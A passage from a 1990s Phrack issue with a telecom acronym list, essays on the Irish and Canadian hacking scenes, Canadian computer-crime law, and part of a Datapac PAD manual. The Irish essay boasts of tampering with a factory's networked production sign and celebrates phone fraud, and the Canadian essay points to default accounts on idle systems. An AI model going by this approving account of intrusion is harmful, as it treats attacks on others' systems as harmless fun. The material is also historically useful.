VCB          Virtual circuit bearer
VCS          Virtual circuit switch (as in Datakit)
VCS          Virtual circuit switching
VCS          Virtual circuit system
VDC          Unk? (On service order)
VDT          Video display terminal
VERS         Version
VF           Commercial television (full time) INTER/TRA blocal 1-26
VF           Voice frequency
VFAC         Verified and forced account codes
VFD          Verify display
VFG          Virtual facility group
VFN          Vendor feature node
VFS          Verify status
VFY          Verfy
VFY          Verify
VG           Voice grade
VGB          Voice grade budget
VGF          Voice grade facility
VGT          Boltage test
VGT          Voltage test (SARTS command)
VH           Commercial television (part time) INTER/TRA blocal 1-26
VHDL         Very high scale ic description language (DOD)
VHF          Very high frequency
VINES        Virtual network software
VIU          Voiceband interface unit
VL           (Ger) connecting cable
VLD          Validity
VLSI         Very large-scale integrated circuitry
VLT          Voltage
VM           Control/remote metering-voice grade INTER/TRA blocal 1-26
VM/SP        Virtual machine/system product
VMC          Vender marketing center
VMCF         Virtual machine communications facility
VMR          Volt-meter reverse
VMRS         Voice message relay system
VMS          Virtual memory operating system
VMS          Voice mail system
VMS          Voice management system
VMS          Voltage Monitor error Summary
VNF          Virtual network feature
VNL          Via net loss plan
VNLF         Via net loss factor
VO           International overseas television INTER/TRA blocal 1-26
VODAS        Voice over data access station
VPA          Voice path assurance timeout (outgoing)
VPN          Virtual private network
VR           Non-commercial television
VRMS         Voltage remote mean square
VRS          Voice response system
VSAM         Virtual storage access method
VSAT         Very small aperature terminal
VSAT         Very small aperture terminal (for satellite communication)
VSB          Vestigial sideband modulation
VSC          Vendor service center
VSE          Virtual storage extended
VSP          (ger) full frame storage
VSR          Voice storage and retrieval
VSRTP        Voice service remote test port
VSS          Voice storage system
VSSP         Voice switch signaling point
VSt          (ger) exchange unit
VT           Vertical tabulator
VT           Virtual terminal
VTAM         Virtual telecom access method
VTAM         Virtual telecommunications access method
VTI          Virtual terminal interface
VTOC         Volume table of contents
VTS          Video teleconferencing system
VUA          Virtual user agent
W            Date and time this ticket is closed.
W            With
WADS         Wide area data service
WAN          Wide area network
WATS         Wide area telecommunications service
WATS         Wide area telephone service
WB           Wideband digital 19.2 kb/s-service code for LATA access
WC           Special 800 surface trunk INTER/TRA blocal 1-26
WC           Wire center
WCC          Change wire center  - COSMOS command
WCI          Write controller interface (IOM2 monitor command)
WCPC         Wire center planning center
WCT          Worksheet for cable throw orders
WD           Special wats trunk (out) INTER/TRA blocal 1-26
WDCS         Wideband digital cross-connect system
WDFHP        Recursive high pass filter + decimation filter
WDFLP        Recursive low pass filter + decimation filter
WDM          Wavelength division multiplex
WDM          Wavelength division multiplexing
WDT          Watch dog timer
WE           Wideband digital 50 kb/s-service code for LATA access
WEBS         Wells electronic banking system
WF           Wideband digital 230.4 kb/s-service code for LATA access
WFA          Work and force administration
WFA-CMSA     Work and force administration - common module for
              systems administration
WFA/DO       Work and force administration/dispatch out
WFL          Working frame location
WG           Switch group
WH           Wideband digital 56 kb/s-service code for LATA access
WI           800 surface trunk INTER/TRA blocal 1-26
WI           Wink start
WIP          Workcenter information package
WJ           Wideband analog 60-108 khz-service code for LATA access
WL           Wideband analog 312-552 khz-service code for LATA access
WM           Work manager
WN           Wideband analog 10hz-20 khz-service code for LATA access
WO           Wats line (out) INTER/TRA blocal 1-26
WOI          Work order inquiry
WOL          Work order listing
WORD         Work order and record detail
WORD         Work order record and details
WP           Wideband analog 29-44 khz-service code for LATA access
WPN          Work package number
WPT          Work package table
WPT          Work package type
WR           Wideband analog 564-3064 khz-service code for LATA access
WS           Wats trunk (out) INTER/TRA blocal 1-26
WSL          Work status list
WSO          Wats service office
WUL          Work unit report for subscriber line
WX           800 service line INTER/TRA blocal 1-26
WY           Wats trunk (2-way) INTER/TRA blocal 1-26
WZ           Wats line (2-way) INTER/TRA blocal 1-26
X            Check t for trouble
X-bar        Crossbar
XA           Dedicated digital 2.4 kb/s-service code for LATA access
XAD          Transmit adress
XB           Dedicated digital 4.8 kb/s-service code for LATA access
XB           X-bar
XBT          X-bar tandem
XFE          X-front end
XFIFO        Transmit fifo
XG           Dedicated digital 9.6 kb/s-service code for LATA access
XH           Dedecated digital 56. kb/s-service code for LATA access
XID          Exchange identification (LAP-D command/response)
XMS          Extended multiprocessor operating system
XN           X
XN           X number
XOFF         Transmission off (dc1)
XON          Transmission on  (dc3)
XPL          Cross reference protocol listing (PCT)
XST          Expected stop time-out
XTC          Extended test controller
XTC          Extended test controllers
XTC          Extened test controller
Y            Initials of person to whom ticket is dispatched
Z            Redispatch information.
Z            Transmit level point z
ZA           Alarm circuts INTER/TRA blocal 1-26
ZC           Call and talk circuts INTER/TRA blocal 1-26
ZCS          Zero code suppression
ZCS          Zero code suppression encoding (ds-1)
ZE           Emergency patching circuts INTER/TRA blocal 1-26
ZF           Order circuts- facility INTER/TRA blocal 1-26
ZM           Measurement and recording circuts INTER/TRA blocal 1-26
ZN           Zone location
ZP           Test circut- plant service center INTER/TRA blocal 1-26
ZQ           Quality and management circuts INTER/TRA blocal 1-26
ZS           Switching- control and transfer circuts INTER/TRA blocal 1-26
ZT           Test circuts- central office INTER/TRA blocal 1-26
ZV           Order circuts- service INTER/TRA blocal 1-26
kHz          Kilohertz-one thoughand hertz


----------------------EOF------EOF-------EOF------EOF----------------------




--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 26 of 27

                              International Scenes

There was once a time when hackers were basically isolated.  It was
almost unheard of to run into hackers from countries other than the
United States.  Then in the mid 1980's thanks largely to the
existence of chat systems accessible through X.25 networks like
Altger, tchh and QSD, hackers world-wide began to run into each other.
They began to talk, trade information, and learn from each other.
Separate and diverse subcultures began to merge into one collective
scene and has brought us the hacking subculture we know today.  A
subculture that knows no borders, one whose denizens share the common goal
of liberating information from its corporate shackles.

With the incredible proliferation of the Internet around the globe, this
group is growing by leaps and bounds.  With this in mind, we want to help
further unite the communities in various countries by shedding light
onto the hacking scenes that exist there.  We have been requesting files
from people to describe the hacking scene in their country, but
unfortunately, more people volunteered than followed through (you know
who you are.)  By next issue we will have more, I'm sure, but for now,
we want to introduce you all to the scenes in Ireland and Canada.


*****************************************************************************

COUNTRIES ON THE INTERNET

AD   Andorra
AE   United Arab Emirates
AF   Afghanistan
AG   Antigua and Barbuda
AI   Anguilla
AL   Albania
AM   Armenia
AN   Netherland Antilles
AO   Angola
AQ   Antarctica
AR   Argentina
AS   American Samoa
AT   Austria
AU   Australia
AW   Aruba
AZ   Azerbaidjan
BA   Bosnia-Herzegovina
BB   Barbados
BD   Bangladesh
BE   Belgium
BF   Burkina Faso
BG   Bulgaria
BH   Bahrain
BI   Burundi
BJ   Benin
BM   Bermuda
BN   Brunei Darussalam
BO   Bolivia
BR   Brazil
BS   Bahamas
BT   Buthan
BV   Bouvet Island
BW   Botswana
BY   Bielorussia
BZ   Belize
CA   Canada
CC   Cocos Island
CF   Central African Republic
CG   Congo
CH   Switzerland
CI   Ivory Coast
CK   Cook Islands
CL   Chile
CM   Cameroon
CN   China
CO   Colombia
CR   Costa Rica
CS   Czechoslovakia
CU   Cuba
CV   Cape Verde
CX   Christmas Island
CY   Cyprus
DE   Germany
DJ   Djibouti
DK   Denmark
DM   Dominica
DO   Dominican Republic
DZ   Algeria
EC   Ecuador
EE   Estonia
EG   Egypt
EH   Western Sahara
ES   Spain
ET   Ethiopia
FI   Finland
FJ   Fiji
FK   Falkland Islands
FM   Micronesia
FO   Faroe Islands
FR   France
FX   France
GA   Gabon
GB   Great Britain (UK)
GD   Grenada
GE   Georgia
GH   Ghana
GI   Gibraltar
GL   Greenland
GP   Guadeloupe
GQ   Equatorial Guinea
GF   French Guyana
GM   Gambia
GN   Guinea
GR   Greece
GT   Guatemala
GU   Guam
GW   Guinea Bissau
GY   Guyana
HK   Hong Kong
HM   Heard & McDonald Island
HN   Honduras
HR   Croatia
HT   Haiti
HU   Hungary
ID   Indonesia
IE   Ireland
IL   Israel
IN   India
IO   British Indian Ocean Territories
IQ   Iraq
IR   Iran
IS   Iceland
IT   Italy
JM   Jamaica
JO   Jordan
JP   Japan
KE   Kenya
KG   Kirgistan
KH   Cambodia
KI   Kiribati
KM   Comoros
KN   St.Kitts Nevis Anguilla
KP   North Korea
KR   South Korea
KW   Kuwait
KY   Cayman Islands
KZ   Kazachstan
LA   Laos
LB   Lebanon
LC   Saint Lucia
LI   Liechtenstein
LK   Sri Lanka
LR   Liberia
LS   Lesotho
LT   Lithuania
LU   Luxembourg
LV   Latvia
LY   Libya
MA   Morocco
MC   Monaco
MD   Moldavia
MG   Madagascar
MH   Marshall Islands
ML   Mali
MM   Myanmar
MN   Mongolia
MO   Macau
MP   Northern Mariana Island
MQ   Martinique
MR   Mauritania
MS   Montserrat
MT   Malta
MU   Mauritius
MV   Maldives
MW   Malawi
MX   Mexico
MY   Malaysia
MZ   Mozambique
NA   Namibia
NC   New Caledonia
NE   Niger
NF   Norfolk Island
NG   Nigeria
NI   Nicaragua
NL   Netherlands
NO   Norway
NP   Nepal
NR   Nauru
NT   Neutral Zone
NU   Niue
NZ   New Zealand
OM   Oman
PA   Panama
PE   Peru
PF   Polynesia
PG   Papua New Guinea
PH   Philippines
PK   Pakistan
PL   Poland
PM   St. Pierre & Miquelon
PN   Pitcairn
PT   Portugal
PR   Puerto Rico
PW   Palau
PY   Paraguay
QA   Qatar
RE   Reunion
RO   Romania
RU   Russian Federation
RW   Rwanda
SA   Saudi Arabia
SB   Solomon Islands
SC   Seychelles
SD   Sudan
SE   Sweden
SG   Singapore
SH   St. Helena
SI   Slovenia
SJ   Svalbard & Jan Mayen Islands
SL   Sierra Leone
SM   San Marino
SN   Senegal
SO   Somalia
SR   Suriname
ST   St. Tome and Principe
SU   Soviet Union
SV   El Salvador
SY   Syria
SZ   Swaziland
TC   Turks & Caicos Islands
TD   Chad
TF   French Southern Territories
TG   Togo
TH   Thailand
TJ   Tadjikistan
TK   Tokelau
TM   Turkmenistan
TN   Tunisia
TO   Tonga
TP   East Timor
TR   Turkey
TT   Trinidad & Tobago
TV   Tuvalu
TW   Taiwan
TZ   Tanzania
UA   Ukraine
UG   Uganda
UK   United Kingdom
UM   US Minor Outlying Islands
US   United States
UY   Uruguay
UZ   Uzbekistan
VA   Vatican City State
VC   St.Vincent & Grenadines
VE   Venezuela
VG   British Virgin Islands
VI   U.S. Virgin Islands
VN   Vietnam
VU   Vanuatu
WF   Wallis & Futuna Islands
WS   Samoa
YE   Yemen
YU   Yugoslavia
ZA   South Africa
ZM   Zambia
ZR   Zaire
ZW   Zimbabwe

****************************************************************************

                           HACKING IN IRELAND
                                   BY
                                HAWKWIND

 Greetings from the Emerald Isle!  My name is Hawkwind, and I'm an
Irish hacker *evil cackle*.  So, what's the hacking scene like in this
small green island called Ireland, perched on the edge of the Atlantic
Ocean?  -an island which claims to have one of the most sophisticated
digital phone networks in Europe, home of Eirpac (the Irish equivalent to
Sprintnet/Telenet) and lots of other weird and wonderful things like
that.

 Well, the hacking scene, like the country itself, is small
-there are no elite in Ireland. -or if there are they are so elite that
nobody has heard of them.  So if you're only into elite stuff, then
don't bother reading on, skip onto the next country.

 Also, sadly at the moment, there seems to be little interest in
hacking in Ireland  -I can count the number of Irish hackers I know on
the fingers of one hand.  Maybe I'm just hanging out in the wrong places,
or perhaps its the Iron Hand of Ireland's own Little Brother, friend and
follower of the U.S's Big Brother, enforcing his evil ways of censorship
and the like upon us all, denying us the right to free information.
Nationwide censorship of Usenet hurts like dry ice, but restricting ftp
and telnet out of the country to the privileged few, is the fatal
crunch.  Now, I ask you, with grief like this, is it any wonder so few
Irish have made it into the Computer Underground  -to those that have
beaten the odds, I wish them well.

 OK, so what do Irish hackers like to hack?  Like many hackers we
just have the curiosity and desire to explore any system or network we
come across  -the everlasting search for that spine-tingling adrenaline
rush when you've beaten the system and got somewhere where perhaps no
commoner has gone before  -don't ever ask us to choose between getting
well drunk, having sex, or hacking  --it would be a rough choice.

 Let me start by telling you of what I find an interesting moment
in Irish hacking history. -to you it may just seem like no big deal, but
we kinda like it.
 There is a type manufacturing company in Dublin, Ireland and
they like to make tyres--in order not to ruin any reputations we won't
mention any names--just another tyre company.  Now this company likes
nice modern systems--big colorful display panels with lots of flashing
lights, to keep their managers happy and amused for hours.  A happy
company is lots of happy striving workers and so, a big flashy sign
which displayed the number of tyres being produced, and dutifully
counted upwards every time one come off the assembly line, was
constructed.  So they had a big sign inside the plant so the workers
could see how hard they were working, and big bonuses and lots of
presents were promised if they got past a certain number in a day.
There was also a large juicy sign outside the plant showing this number
so that the general public could be suitably impressed with the busy-bee
workers and the number of tyres being produced.

 And all these signs and computers controlling them were
connected to such mysteries as a network with a couple of black boxes
which management proudly called modems  -enter stage left, Irish
hackers, *deep bow and evil wave*

 So you can imagine, one warm sunny summer's evening, when there
was really nothing better to do in Dublin, strange things started to
happen at the tyre factory.  Yes, strange things indeed.  Suddenly the
workers got very lazy and started slowing down their production,
becoming slower and slower and slower.  The numbers stopped counting up
on the glowing sign.  Then the digits oddly started counting backwards.
Down they went, getting faster and faster  -people began to picture
enraged workers destroying tyres in a crazed frenzy.  Soon our sign
showed that there were no tyres left and it began to dive into negative
numbers of tyres.  The passers-by scratched their heads in astonishment.

 Ah, but enough fun  -this really was a very good tyre company
with very hard-working workers.  They deserve lots of bonuses  -heck,
didn't someone say this was the most productive factory in Europe?  Well
it was that day anyway! *evil cackle*  So the signs stopped counting
backwards, and suddenly began to race forwards like there was no
tomorrow.  The workers were scurrying back and forth at lightening speed
-one hundred, two hundred..a thousand...ten thousand...what, a hundred
thousand!  Soon our good workers had produced more tyres in the space of
20 minutes, than visitors Disneyland had in 25 years...

 Ah yes, these are the things that Irish hackers like to do -we
still wonder if the management gave all those good workers their
bonuses??

 So really, we like to investigate or hack anything that we might
stumble across  -anything from the local University library computer to
tyre companies to networks in lands far away.  One of the things we
really like doing is just exploring, hopping from one network to the
next, using computers in such awed places as the U.S., Canada or Mexico,
this is probably because for us, even to reach such computers and
networks is an achievement, that our Little Brother would deny us had he
his evil ways.  We think that the Internet is one of the greatest
creations in a long time, and we would never want to do any malicious
damage on such a free association  -if only our Little Brother would let
us associate freely with it, instead of making life just that little bit
more difficult.  We find Sprintnet and other connected goodies
interesting prowling grounds, although we are the first to admit that we
still have very much to learn here.  To explore these systems is very
interesting for us, because they are so far away and in such interesting
lands that we may never see ourselves  -what to you might be the old U.S.,
to explore the nets there gives us a sense of excitement and a variety
of systems that cannot be found on such a small island as our own
Ireland.

    And of course, there is the never-ending quest for U.S. outdials
in the hope that one day we might actually reach some of the fabled U.S.
h/p boards and actually meet a real Fed or two.  *snicker*  Turning from
the strictly hacking scene for the moment there are some Irish people
interested in the phones and other phun things  -a while back two
college guys were busted for cracking an eleven digit code on some new
phone system chip or something, which had given them unlimited dialling
access and other phun privileges.  -then there was the magic toll free
number which for a month or two gave the Irish population unlimited
access to the outside world (a big thank-you goes to whoever worked that
one out. *grin*)  I'm told from reliable sources that we have a pretty
sophisticated phone system, a matter we soon hope to be investigating,
but this does not seem to have stopped phreakers from trying, and if we
manage to work anything out, we'll, as our 'Telecom Eireann' so aptly
put it 'Keep in touch across the world'.

 Sadly, we are plagued by outrageous phone charges, even for
local calls and hence many Irish boards have failed to blossom  -of
those that do, the sysops seem to be little interested in h/p talk and I
know of no dedicated h/p Irish board.

 There also used to be a type of Underground meeting that occurred
every dark rainy Sunday afternoon, down in the Ormond, a hotel in Dublin
city centre.  It passed unheeded under the guise of a computer club, but
the bloke who ran it was a renowned con-man, and dealer of everything
and anything from car radios to Rolex watches  -in any event the club
must have been one of the biggest WareZ swapping centres, including all
the latest videos from the U.S. which would not be released in the
cinemas(movies) here until six months later.  Generally people
interested in the same computer type things just got together to chat
and swap the latest news, disks and videos  -an interesting place with
interesting folks, which sadly no longer seems to happen.  Perhaps
someone will revive something similar in the near future.

 Well, I'll end the tale there for the moment.  Hopefully you've
gotten a little flavor of our little Underground, watched over by our
Little Brother, in our little country called Ireland.  I'm not sure how
I ended up writing this article, but since nobody else stepped forward, I
thought Ireland should at least get some kind of mention, if nothing
else  -so you can /dev/null any flames.

 Before I sign off, I'd just like to thank Phrack not only for
giving me the chance to tell my tale, but for supplying us with a great
publication and guide to the Underground.  Finally, if you are an Irish
hacker/phreaker, then get in touch now!!!  -I really want to be able to say
that I can count the number of Irish hackers I know on two hands, and not
just one, before the end of the decade!  Also, I am always interested in
talking to anyone interested in the hack/phreak world so get in touch if
you want to chat  -just remember, we are no elite!
(I don't suppose anyone out there, knows anything about the Irish phone
system? *shrugs*)

Ok, I can be reached at the following, for the next little while:
(Yes, I do have Irish a/c's but not for thine eyes...)

 al575@yfn.ysu.edu
 hawkwind@m-net.ann-arbor.mi.us
 hawkwin@santafe.edu  (note: no 'd' at end userid)


I'm also sometimes on IRC, and may hopefully be on phantom soon.
Well, as we say in Ireland, good luck and may the road rise up before
you.

Slan Leat,
Hawkwind.

*****************************************************************************


                           Canada
              All is Quiet on the Northern Front

                Written and compiled by Synapse

Welcome to the barren wastes or rather the undeveloped wastes if
you will. Welcome to Canada. A realm seldom traveled and less
often explored. Canada, or .ca if you will, is virgin country in
the net. There are places that have been sitting idle for years
on our nets that still have default accounts in use. There is an
unmeasurable amount of data out there waiting to be tapped. The
possibilities in this are endless, Canada is untouched for the
most part, and as developed networks go, I feel that Canada is as
close to The 'Undiscovered country' as you can get.

Most likely if you are reading this article you will be of a
nationality other than Canadian. If so, perhaps this will be an
educational experience for you. To explain our nets and our scene
here in the far far north, I must first explain our nation and
its greatest difficulty, it has NO identity, therefore it tends
to mirror those it is enamored with.  Hence our scene resembles
an amalgamation of whatever seems popular in the nets at a given
time. Most often it attempts somewhat miserably to emulate the
scene south of our border, the great U S of A. And in short it
fails miserably.

This is not to say that Canada does not have a scene of its own
nor is it attempting to take away from those scenes that have
developed fully on their own within .ca. It is simply bringing to
light a problem that plagues our scene and dilutes it for those
who are serious about the computer underground, and whatever
ideals it may contain.

If you travel the nets in Canada you will find that dissent and
"ElYtEeGoStRoKInG" are staple with both the Hacking and Warez
scenes all throughout the nine provinces and 2 territories. As I
am sure you know this is not a problem unique to .ca. However in
a scene as minute and spread painfully thin as ours, arrogance
and mis-communication can be fatal in the way of cooperation
gaps. This has proved the case many times in the recent past, and
I am sure it will in the near future as well.

Canada seems to a have a communication barrier that separates
east from west. There is simply close to no communications
between the two. It is as if we are in separate hemispheres and
lost to the technology of fibber optics and damned to smoke
signals and drum beating. I have to wonder sometimes if both
sides are so involved in their own local power struggles, that
the rest of the world has melted away including their country men
on either side.

Alas it is time to dive into this the this of the article. To
detail the complete underground in Canada would be impossible for
me to do, to even give a non-biased view would be impossible. So
if you feel that this is simply an overextended opinion, thank
IBM for the PgDn key and spare yourself some opinionated text.

                    The Almost LODs of .ca

Just like the U.S., Canada is proliferated with umpteen amounts
of upstart groups who after reading some trashy second rate book
on LOD or Kevin Mitnick, have decided that they have found what
it is to be elyte. Most often these will be the prominent voices
on underground boards spitting flame and stroking immeasurably
unhealthy egos, and boasting how proficient they are with toneloc
and Killer Cracker. However as with most boasts put forth by
fourteen year olds, nothing comes of it.

However if you can manage passage through the quagmire of shit
that serves as the .ca scene, then you will most likely encounter
some of .ca's more serious minded types who while retaining
talent and a penchant for learning, do not sport an ego of
astronomical proportions, and wit that would bring condescension
from an ant. The following is a short list of several of .ca's
more prominent if not more talented groups.

                   RaBID The Virus People

If the Virus world is your environment, then most likely you
have stumbled across the work of RaBID, hopefully not on the
receiving end.. Rabid is based out of 416 or rather Toronto
Canada, at it's prime Rabid was running a mail net that spanned
Canada and were releasing enough material to employ the boys at
McAfee. Things have changed. While Rabid had at one point been a
productive group (if you can call a virus group productive) time
seems to have worn their edge, in fact Rabid as a group have
failed to release anything of value in a great long time. Perhaps
this will change. If nothing else Rabid did bring a much needed
ego boost to the Canadian scene, in doing so they opened the door
for other such groups to be seen on the international level with
out being laughed out of the nets. For this if nothing else they
deserve recognition. There is a great deal more to be said  about
Rabid, however as I said all the information given here will be
cursory, if you require an information at all in the future on
Rabid or any of the groups mentioned below I will leave an e-mail
address below where you can write me, I will help you if I can.

                 FOG out of 403 Calgary, Alberta

No scene is complete without talented juveniles given to temper
tantrums virus spreading and general malicious behavior..Enter
FOG. FOG stands for the Fist Of God, it is for the most part a
group of individuals who go through unnatural amounts of effort
to get under the skin of others. Yet beyond juvenile behavior
that tends to underscore most endeavors they undertake. FOG does
for the most part work very diligently for a united .ca scene.
They have in the past run a nation wide net using encrypted mail
procedures so that dialogue could be opened between the east and
western scenes. This event was stopped when the Hubs house was
raided by the Royal Canadian Mounted Police for suspected telco
abuse, they were no charges laid however yet the organizers felt
that the information passing through the net was much too
valuable to be compromised by a bust. The net was killed.

After the net disappeared several members of FoG began writing
bbs software to be spread across the country to make networking
easier or rather standardized. The bbs also includes encryption
options for the mail, and will soon be HAM radio as well as
cellular modem capable. This program is available to any who wish
to take it, as I said earlier, just mail me.

                   NuKE Making Art out of Arrogance

NuKE hails from 516 Montreal, Canada.  It as far as I can see
primarily now a virus group. Producing and modifying strains, for
the most part NuKE has been the most active underground .ca group
that has seen movement on an international level, with this past
year.

It's membership has changed quite severely since I last had
contact with them. Therefore I fear that to publish anything else
on them would be inaccurate and therefore an injustice. However
if you are interested in pursuing this topic........Mail me.


As you can see these are cursory overviews of Canada's groups it
is of course largely incomplete, I provided it only to serve as a
guide for the feeling of Canada's groups. There are of course
many worth mentioning that I failed to show, and moreover there
is a great deal more to  the groups that I did mention. To those
who are in the above groups are unhappy with the opinion put
forth please by all means FUCKOFF. I e-mailed all of you, and in
your infallible wisdom you failed to reply. So suffer with it :>

                     .ca and the law

While Canada has been for the most part largely un-abused by the
'Computer Criminal'. It's laws are none the less fairly advanced.
Our legislators to their credit have kept a close eye on our
neighbors in the south, and have introduced laws accordingly.

The following is the Canadian criminal code as pertaining to
Computer Crime.

342.1
    (1) Every one who, fraudulently and without color of right,
        (a) obtains, directly or indirectly, any computer service,
        (b) by means of an electro-magnetic, acoustic, mechanical
             or other device, intercepts or causes to be intercepted,
            directly or indirectly, any function of a computer system, or,
        (c) uses or causes to be used, directly or indirectly, a
            computer system with intent to commit an offense under
            paragraph (a) or (b) or an offense under section 430 in
            relation to data or a computer system
            is guilty of an indictable offence and liable to
            imprisonment for a term not exceeding ten years, or is
            guilty of an offence punishable on summary conviction.
    (2) In this section, "computer program" means data representing
        instructions or statements that, when executed in a computer
        system, causes the computer to perform a function;
        "computer service" includes data processing and the
        storage or retrieval of data; "computer system" means
        a device that, or a group of interconnected or related
        devices one or more of which,
                (a) contains computer programs or other data, and
                (b) pursuant to computer programs,
                    (i) performs logic and control, and
                    (ii) may perform any other function;
        "data" means representation of information or of concepts
        that are being prepared or have been prepared in a form
        suitable for use in a computer system;
        "electro-magnetic, acoustic, mechanical or other device"
         means any device or apparatus that is used or is capable of
         being used to intercept any function of a computer system,
         but does not include a hearing aid used to correct subnormal
         hearing of the user to not better than normal hearing;
        "function" includes logic, control, arithmetic, deletion,
        storage and retrieval and communication of telecommunication to,
        from or within a computer system; "intercept" includes listen
        to or record a function of a computer system, or acquire the
        substance, meaning or purport thereof.

430.
    [...]
    (1.1) Every one commits mischief who willfully
        (a) destroys or alters data;
        (b) renders data meaningless, useless or ineffective;
        (c) obstructs, interrupts or interferes with the lawful
            use of data; or
        (d) obstructs, interrupts or interferes with any person
            in the lawful use of data or denies access to data
            to any person who is entitled to access thereto.
    [...]

    (8) In this section, "data" has the same meaning as in
        section 342.1.

As you can see our criminal code carries severe penalties for
both Hacking and Virus spreading however, there is little
precedent to set sentences by. While this is reassuring, there
seems to be a new trends to prosecute those who are caught at
computer crime. Moreover it seems to be a trend to prosecute with
setting precedence in mind.. So for those of you in .ca who have
busted recently I would begin to fear right about now.

For the most part most computer crime in Canada that results in
busts is telco related, most often the charges are federal but
the sentences are light, however as I said before, this is
changing. And will continue to change with each new bust ,
welcome to the new dawn I suppose.

                     Datapac, Canada's first net

As it stands Datapac is Canada's largest and most used
network, it is old archaic and slow, yet still it is immense
amounts of fun to play with. The following is a technical excerpt
to help you understand the operation of Datapac and how to
maneuver it. Those of you who are already familiar with the
workings of this type of network will find this dry and
repetitive for those of you who are not familiar it may  make for
some learning.

After the manual entry you will find a list of interesting sites
to explore with, enjoy....

              Datapac 3101 "Welcome to the Dark Ages"

Interface (ITI) in a Packet Assembler/Disassembler (PAD), which
allows the devices to access the Network over dial-up (DDD) or Dedicated
Access Lines.

ITI, the end-to-end protocol for Datapac 3101, conforms to the
CCITT recommendations X.3, X.28 and X.29 and supports access to the
Datapac Network for asynchronous, start-stop character mode terminals.

     X.3 specifies the operation of the PAD.  It contains the
specifications for the twenty-two International parameters and
their operation.

     X.25 specifies the command language between the terminal and
the PAD.  It also specifies the conditions which define the command
mode and the data transfer mode.

     X.29 specifies the procedures to be followed by an X.25 DTE
to access and modify the parameters in the PAD as well as the data
transfer procedure.

The Datapac 3101 service provides for terminal to Host (user's
computer) and terminal to terminal communication.  The Host access
should conform with the X.25 protocol, using the Datapac 3000 access
service, and also support the higher level protocol conventions for ITI.
Host access may also be provided via the Datapac 3101 service for some
applications.  The Datapac 3101 service also provides block mode and
tape support.

INTERNATIONAL PAD PARAMETERS
----------------------------

1)   Ability to Escape from Data Transfer State*

     The setting of this parameter allows the user to interrupt
the communication of his or her application (data transfer mode) and
interact with the PAD (common mode).  The character to do this is
"ControlJP".  To return to data transfer mode, press the carriage
return or enter a blank command line.  If the user wants to send a
"ControlJP" to the Host, with this parameter set set to one, simply
hit ControlJP twice and the second ControlJP will go to the Host and
the user will remain in data transfer mode.  This also applies to
the user data field in the call request command line.

Parameter Number:  1
Possible Values:   0 = Escape not possible.
                   1 = Escape is possible.

*Note:  Escape from Data transfer mode may also be possible using
the break signal if parameter seven is set to eight.


2)   Echo*

     This parameter indicates to the PAD whether or not the
terminal input data must be echoed.  This may be required if the user's
terminal cannot echo back what is being entered.

Parameter Number:  1
Possible Values:   0 = No echo.
                   1 = Echo.

*Note:  Echo will also be affected by the setting of Parameter 20.


3)   Selection of Data Forwarding Signal

     This parameter indicates to the PAD the set to terminal
generated characters or conditions that will cause data to be forwarded
to the destination.  For example, (CR) can be used as a data forwarding
signal on receipt of a (CR) from the local DTE Y, the PAD will forward all
characters in its buffer to the remote end, including the (CR).  If P13 is
set to 6.7, 22 or 23, a (LF) will be included in the packet and will delimit
it.  Data is also forwarded when the buffer is full whether or not a
forwarding character is received.

Parameter Number:  3
Possible Values:   0 = No data forwarding signal.
                   2 = Forward on carriage return.
                   2 = Carriage return.
                 126 = All characters in columns 0 and 1
                       of ASCII table and the character
                       del of International alphabet #5.


4)   Selection of Idle Timer Delay

      This parameter is used to determine the idle timer limit
value when data forwarding is based on timeouts.  To optimize packetizing
of data, no data forwarding signal need be specified.  The PAD will then
packetize data based on packet size specified (256 or 128 characters).
The idle timer is used to send any packets that are not fully filled.
If idle timer is activated and the Host requires the (CR) to input data,
it still must be provided before the data send is accepted by the Host.
The idle timer does not send any empty packets.


Parameter Number:  4
Possible Values:   0 = No data forwarding on timeout is
                       required.
               1-255 = Indicates value of the delay in
                       twenties of a second.  (i.e., a
                       value of 250 makes the time wait
                       10 seconds)

*Note:  When editing is on (P15:1), the idle timer is inactive.
If this is the only data forwarding condition, turning the editing function
on could cause a user terminal to hand or data not to be forwarded.

5)   Auxiliary Device Control*

     This is used for flow control of data coming from either a
PC or auxiliary device, e.g.:  a paper tape machine.  When set to
1 it indicates to the PAD that the data is to be read an auxiliary
I/O device connected to the terminal.  This parameter set to 2 indicates
that the data is coming from an intelligent device, i.e., a PC, and that
the PAD must exert flow control differently.

Parameter Number:  5
Possible Values:   0 = No use of X-on/X-off.
                   1 = Use of X-on/X-off for auxiliary
                       devices.
                   2 = Use of X-on/X-off for
                       intelligent terminals.

*Note:  A value of 2 is recommended for PC's.


6)   Suppress Network Messages

     This parameter indicates to the PAD whether or not Network
generated messages are to be transmitted to the terminal.

Parameter Number:  6
Possible Values:   0 = Suppress message.
                   1 = Transmit message.
                   5 = PAD prompt (*) follows Datapac
                       service signals.

7)   Procedure on Break

     This parameter is used to indicate how the PAD should
process a break signal that is received from the terminal
while the terminal is in data transfer state.

Parameter Number:  7
Possible Values:   0 = Nothing. (remain in data transfer
                       mode)
                   1 = Interrupt. (remain in data
                       transfer mode)
                   2 = Reset. (remain in data transfer
                       mode)
                   4 = Send an "indication of break"
                       message to the packet mode DTE.
                       (remain in data transfer mode)
                   8 = Escape from data transfer mode
                       (i.e., enter command mode)
                  16 = Discard output to terminal
                       activate Parameter 8 (P8:1)
                       (remain in data transfer mode)
                  21 = A combination of 1, 4 and 16.


*Note:  The break signal is ignored if the virtual circuit is not
established while in command state.  The break signal will delete
the current line.

         The valid values for P7 are 0, 1, 2, 8 and 21.

8)   Discard Output

     This parameter is used in conjunction with Parameter 7.
Depending upon the break procedure selected, this parameter may be
set by the PAD when the terminal user requests that terminal data be
discarded.  This parameter must then be reset by the destination
computer to allow normal delivery.  The PAD will discard all packets
destined for the terminal from the time the PAD sets this parameter
(i.e., it receives a break signal when Parameter 7 is set to 21) to
the time the parameter is reset by the destination.  It can only be
reset by the destination.

Parameter Number:  8
Possible Values:   0 = Normal delivery of output to
                       terminal.
                   1 = Discard output to terminal.

9)   Padding after Carriage Return

     This parameter is used to specify the number of padding
characters to be inserted by the PAD following a CR transmitted
to the terminal.  Padding allows time for the carriage to return
on mechanical printing devices.


Parameter Number:  9
Possible Values:   0 = 2 padding characters will be
                       inserted at 110 bps and 4
                       padding characters will be
                       inserted at higher speeds, in
                       command mode only.  (no padding
                       is done in data transfer mode)
               1-255 = The number of padding characters
                       to be inserted in both data
                       transfer and command mode.

10)  Line Folding

     This parameter indicates the maximum number of printable
